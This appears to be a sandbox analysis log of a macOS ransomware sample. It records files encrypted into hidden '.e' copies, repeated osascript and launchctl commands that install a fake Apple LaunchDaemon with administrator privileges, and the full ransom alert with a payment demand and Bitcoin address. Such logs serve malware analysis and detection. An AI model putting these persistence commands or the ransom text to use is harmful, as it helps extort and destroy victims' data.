Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.fileAttributes-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/.suggestions.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/Other/English/.fileAttributes-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/Microsoft/uls/com.microsoft.autoupdate.fba/logs/.apple-device-log-20201126-1422.log.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CalendarAgent/Data/Library/Preferences/.com.apple.CalendarAgent.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CloudPhotosConfiguration/Data/Library/Preferences/.com.apple.CloudPhotosConfiguration.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.cloudphotosd/Data/Library/Preferences/.com.apple.cloudphotosd.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.Maps/Data/Library/Preferences/.com.apple.Maps.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/Library/Preferences/.com.apple.siri.media-indexer.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.AlertsController.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/.whatsNewJSONCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Preferences/.com.microsoft.Excel.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Office365ServiceV2/Data/Library/Preferences/.com.microsoft.Office365ServiceV2.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/.OneNoteSentinel.snt.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Preferences/.com.microsoft.onenote.mac.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/.whatsNewJSONCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Preferences/.com.microsoft.Outlook.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Preferences/.com.microsoft.Outlook.securebookmarks.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/.whatsNewJSONCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Preferences/.com.microsoft.Powerpoint.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Application Support/.whatsNewJSONCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/.Cookies.binarycookies.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Preferences/.com.microsoft.Word.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Preferences/.com.microsoft.Word.securebookmarks.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/FontCache/4/Catalog/.ListAll_hier.Json.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/FontCache/4/PreviewFont/.hier_officeFontsPreview.ttf.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ActivityMonitor.help*10.13.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AddressBook.help*11.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.airport.airportutility.help*6.3.8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AppStore.help*2.3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AudioMIDISetup.help*3.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Automator.help*2.8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Console.help*1.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DiskUtility.help*17.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DVDPlayer.help*5.8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.FontBook.help*8.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Grapher.help*2.6.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iCal.help*10.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iChat.help*11.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ImageCapture.help*7.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.iTunes.help*12.8.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.machelp*10.13.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Mail.help*11.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Maps.help*2.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Notes.help*4.5.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.PhotoBooth.help*9.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Preview.help*10.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.QuickTimePlayerX.help*10.4.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.reminders.help*5.0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Safari.help*11.0.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ScriptEditor.help*2.10.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Terminal.help*2.8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.TextEdit.help*1.13.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleMain/English/HelpSDMIndexFile/.com.apple.machelp*10.13.2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Excel.ctrlstrcache.en.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.HSTS.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft OneNote/.AriaStorage.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft OneNote/.FirstStartTime.dat.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Caches/com.microsoft.onenote.mac/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Outlook.ctrlstrcache.en.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Powerpoint.ctrlstrcache.en.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Word.ctrlstrcache.en.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/.HSTS.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.BlockLocks.sqlite-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.Outlook.sqlite-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.Office/Outlook/Outlook 15 Profiles/Main Profile/Data/.RecordLocks.sqlite-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/.MapTiles.sqlitedb.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.05FFDE06-7502-4EDD-BBFA-78890F78FF87.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.0C0C5245-148F-499D-8E47-AE50EB5FC261.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.0DCDE0EB-7EC7-468E-8415-20ABE851B2A4.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.26479BCB-1120-4001-B963-D0AA6917C4A3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.488F1386-F519-41AE-8F2A-3032CA44EFA8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.5319D567-A7B5-432B-B2E9-4C799D2C5119.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.5F638F8B-CA19-4778-9256-2CB283B20F39.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.AC9CD1E6-D3A3-4041-BFBE-90AF5A935D47.e	Jump to behavior

Source: /bin/sh (PID: 642)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 648)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 652)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 656)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 672)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 680)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 684)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 688)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 692)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 696)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 723)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 731)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 660)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 664)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 668)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 673)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 700)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 704)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 708)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 712)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
Source: /bin/sh (PID: 716)	Osascript command executed: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges

Source: /Library/mixednkey/toolroomd (PID: 639)	Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
Source: /Library/mixednkey/toolroomd (PID: 639)	Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
Source: /Library/mixednkey/toolroomd (PID: 639)	Shell command executed: sh -c osascript -e 'beep 18say \'Your files are encrypted\' waiting until completion falseset alTitle to \'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop\'set alText to \'Your files are encrypted\'display alert alText message alTitle as critical buttons {\'OK\'}set the clipboard to \'13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7\''
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 643)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 649)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 653)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 657)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 674)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 681)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 685)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 689)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 693)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 697)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 724)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 732)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
Source: /Library/AppQuest/com.apple.questd (PID: 647)	Shell command executed: sh -c osascript -e 'do shell script \'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd\' with administrator privileges'
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 661)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 665)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 669)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 677)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 701)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 705)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 709)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 713)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 717)	Shell command executed: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd

Source: /bin/sh (PID: 638)

Chmod executable: /bin/chmod -> chmod +x /Library/mixednkey/toolroomd

Jump to behavior

Source: /bin/sh (PID: 635)

Mkdir executable: /bin/mkdir -> mkdir /Library/mixednkey

Jump to behavior

Source: /usr/bin/osascript (PID: 643)	Security_authtrampoline executable: /usr/libexec/security_authtrampoline /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
